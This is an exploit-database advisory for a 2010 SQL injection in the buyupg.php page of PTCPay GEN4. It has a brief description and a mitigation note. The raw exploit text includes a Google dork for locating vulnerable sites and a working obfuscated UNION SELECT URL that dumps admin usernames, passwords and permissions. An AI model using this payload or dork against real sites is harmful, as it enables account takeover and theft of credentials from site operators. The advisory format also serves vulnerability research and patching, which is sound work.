PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability

vendor:

PTCPay GEN4

by:

Dark.Man

CVSS

HIGH

SQL Injection

CWE

Product Name: PTCPay GEN4

Affected Version From: PTCPay GEN4

Affected Version To: PTCPay GEN4

Patch Exists: No

Related CWE: N/A

CPE: a:ptcpay:ptcpay_gen4

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

PTCPay GEN4 (buyupg.php) SQL Injection Vulnerability

PTCPay GEN4 is vulnerable to SQL injection in the buyupg.php page. An attacker can exploit this vulnerability by sending a crafted HTTP request with a malicious SQL query to the buyupg.php page. This will allow the attacker to extract sensitive information from the database, such as the admin username and password.

Mitigation:

To mitigate this vulnerability, the application should use parameterized queries and input validation to prevent malicious SQL queries from being executed.

Source

Exploit-DB raw data:

=====================================================
PTCPay GEN4  (buyupg.php) SQL Injection Vulnerability
=====================================================

# Exploit Title:
# Date: 28.06.2010
# Author: Dark.Man > dark.kopat@gmail.com
# Thanks To: Diq3N , SkyTurk , ByHuCRe , HeuRiSTiC , th3spy , 3KStyL3 , WatchFul
# Homepage: http://www.Root-Secure.Org/
# Software Link: http://www.ptcpay.com/
# Version: PTCPay GEN4
# Price: $149.99
# Google dork : "Powered by GeN4"
# Category: SQL Injection

----  Exploit ----

Step 1 - Register The Site

Step 2 - Go to link :
http://www.site.com/buyupg.php?upg=2/**/aNd/**/1=0/**/unIon
SeleCT/**/1,2,3,4,5,6,7,CONCAT_WS(CHAR(32,58,32),aId,aUsername,aPassword,aPermissions),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39/**/from/**/admins